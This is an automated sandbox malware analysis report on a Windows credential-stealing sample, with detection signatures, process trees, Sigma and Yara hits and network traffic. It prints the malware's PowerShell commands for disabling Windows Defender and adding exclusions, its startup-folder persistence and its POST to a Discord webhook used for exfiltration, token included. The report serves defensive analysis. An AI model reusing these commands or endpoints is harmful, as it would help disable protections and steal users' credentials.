Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
apDMcnqqWs.exe

Overview

General Information

Sample name:apDMcnqqWs.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff
Analysis ID:1572913
MD5:e09f55d421cb45340a8c97c217ba56cf
SHA1:2280afe7bb2d07c315e2599c21f069dd1b7ce3b8
SHA256:1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • apDMcnqqWs.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\apDMcnqqWs.exe" MD5: E09F55D421CB45340A8C97C217BA56CF)
    • dllhost.exe (PID: 3708 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • powershell.exe (PID: 6032 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2620 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7028 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3708 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6488 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 516 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6484 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 416 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 612 cmdline: "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
apDMcnqqWs.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scrJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000000.2102524227.000001ED082D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: apDMcnqqWs.exe PID: 6924JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            0.0.apDMcnqqWs.exe.1ed082d0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\apDMcnqqWs.exe", ParentImage: C:\Users\user\Desktop\apDMcnqqWs.exe, ParentProcessId: 6924, ParentProcessName: apDMcnqqWs.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', ProcessId: 6032, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\apDMcnqqWs.exe", ParentImage: C:\Users\user\Desktop\apDMcnqqWs.exe, ParentProcessId: 6924, ParentProcessName: apDMcnqqWs.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7028, ProcessName: powershell.exe
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 3708, StartAddress: B28432B0, TargetImage: C:\Windows\System32\dllhost.exe, TargetProcessId: 3708
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\apDMcnqqWs.exe, ProcessId: 6924, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scr
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\apDMcnqqWs.exe", ParentImage: C:\Users\user\Desktop\apDMcnqqWs.exe, ParentProcessId: 6924, ParentProcessName: apDMcnqqWs.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', ProcessId: 6032, ProcessName: powershell.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\apDMcnqqWs.exe, ProcessId: 6924, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\apDMcnqqWs.exe, ProcessId: 6924, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\apDMcnqqWs.exe, ProcessId: 6924, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scr
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\apDMcnqqWs.exe", ParentImage: C:\Users\user\Desktop\apDMcnqqWs.exe, ParentProcessId: 6924, ParentProcessName: apDMcnqqWs.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', ProcessId: 6032, ProcessName: powershell.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: apDMcnqqWs.exeAvira: detected
              Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
              Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scrReversingLabs: Detection: 87%
              Source: apDMcnqqWs.exeReversingLabs: Detection: 87%
              Source: apDMcnqqWs.exeVirustotal: Detection: 78%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scrJoe Sandbox ML: detected
              Source: apDMcnqqWs.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A42B43 CryptUnprotectData,0_2_00007FFD34A42B43
              Source: apDMcnqqWs.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49787 version: TLS 1.2
              Source: apDMcnqqWs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 886Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 07:40:16 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1733902817x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bamIwy83ZFT7y2v3CKu9aewld%2Bvk5ZsQZMYbwR82q9hjVS489nN5myUfGMi6m8s7NR0k3L2GBtHyahxHFoQMCpCskvCplEM5q4aEfLPag2PuRkRIG9qGb%2F2lMrBf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=6c81c4fbb7ebff5ead0ba6483805c69b9b6a88d7-1733902816; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=S3vmSPcTE6BGxcUZYj7Q0aQm8HDzs9bcDml18siBgC0-1733902816347-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f03d3583d1b15a3-EWR{"message": "Unknown Webhook", "code": 10015}
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 07:40:19 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1733902820x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Np5VDrvgrqvDRLxUx6%2BKmWV7%2FaPoUpfZCt6ORwhF4SyjuL8As8OIff8C5J7pYUXbLXdqDWBTdHrDCxISPv%2BxTAt47grRwFy5fZag0kYFnp5J78ATW8w%2Bzj4TZsNM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8f03d3647b820f71-EWR{"message": "Unknown Webhook", "code": 10015}
              Source: powershell.exe, 00000002.00000002.2197486995.00000201753AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
              Source: powershell.exe, 00000002.00000002.2197486995.00000201753AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A348000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A27F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A27F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545P
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
              Source: powershell.exe, 00000002.00000002.2189157435.0000020110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D45E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43C43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2168075363.0000020100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2168075363.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D2C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB33A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.2168075363.0000020100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2197486995.000002017538F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
              Source: powershell.exe, 00000002.00000002.2168075363.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D2C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB33A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
              Source: 4z5ru.scr.0.drString found in binary or memory: https://discord.com/api/v10/users/
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A348000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8Ts
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrom
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
              Source: powershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: 4z5ru.scr.0.drString found in binary or memory: https://github.com/PyDevOG/Divulge-Stealer
